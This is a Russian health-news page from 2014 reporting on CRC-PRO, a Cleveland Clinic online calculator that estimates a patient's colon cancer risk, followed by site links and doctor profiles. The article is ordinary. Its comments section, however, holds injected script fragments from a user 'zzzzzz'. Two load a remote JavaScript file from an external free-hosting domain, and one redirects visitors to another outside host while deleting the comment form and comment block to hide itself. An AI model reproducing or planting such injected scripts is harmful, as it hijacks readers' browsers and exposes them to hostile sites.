Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Узнайте, будет ли у вас р...  >>  Узнайте, будет ли у вас рак в течение 10 лет
 
Обратная связь
 

Узнайте, будет ли у вас рак в течение 10 лет

Размер шрифта
25 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Теперь вам вовсе необязательно следовать рекомендациям, общим для всех – врачи могут подсчитать, насколько данное исследование нужно именно вам! Это стало возможным благодаря новой программе, которая помогает определить риск развития рака. 

Ученые из Кливлендской клиники разработали новую технологию под названием CRC-PRO, которая позволяет врачам быстро и точно рассчитать риск развития рака толстой кишки у конкретного пациента. Информация об этой методике была опубликована в Journal of the American Board of Family Medicine.

CRC-PRO или система для расчета риска рака толстой кишки онлайн, была создана для того, чтобы помочь как врачам, так и пациентам. Согласно последним рекомендациям, каждый человек старше пятидесяти лет должен пройти обследование на предмет выявления рака толстой кишки. Однако благодаря новому методу, врачи смогут точно определить, находится ли пациент в группе риска и стоит ли назначать ему дополнительные анализы и обследования.

Для разработки этого электронного калькулятора ученые из Кливлендской клиники проанализировали данные более чем 180 000 пациентов. Исследование длилось более одиннадцати лет, что позволило более точно определить, какие именно факторы оказывают наибольшее влияние на развитие рака толстой кишки.

«Создание такого калькулятора, который учитывает множество различных факторов, позволяет врачам более точно оценивать риск, а не полагаться только на возрастные характеристики, указанные в рекомендациях», – рассказывает доктор Уэллс, ведущий автор работы. «Врачи могут принять решение обследовать пациентов с высоким риском до 50 лет и в то же время не назначать лишних исследований пациентам из группы низкого риска». Уэллс и его коллеги надеются, что их новая разработка поможет повысить эффективность диагностики рака толстой кишки. К тому же врачи смогут избежать назначения ненужных исследований, что поможет снизить затраты на медицинские услуги.

«Разработка калькуляторов для расчета риска, таких как CRC-PRO, очень важна для принятия правильных медицинских решений», – отмечает Майкл Каттан из Лернерского исследовательского института. «Это еще один шаг в развитии персонализированной медицины, который способствует повышению качества медицинских услуг». Каттан и его команда разрабатывают еще несколько подобных калькуляторов: для заболеваний сердца, опухолей молочной железы, простаты и щитовидной железы.

Так что теперь, благодаря новым достижениям медицинской науки, для каждого пациента может быть легко создана своя собственная программа обследования, которая учтет все его индивидуальные особенности.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 апреля 2015 в 14:06

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:25

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Соевые продукты не просто уменьшают риск рака, но и количество метастазов почти на 100%   Длинные стройные ноги… Красота! А риск рака выше   Соя спасет от рака кишки   Какой напиток не позволит вам ослепнуть?!  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Что можно и чего нельзя с изжогой?
Бронхит: лицом к лицу
Еда против рака. Часть 2

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.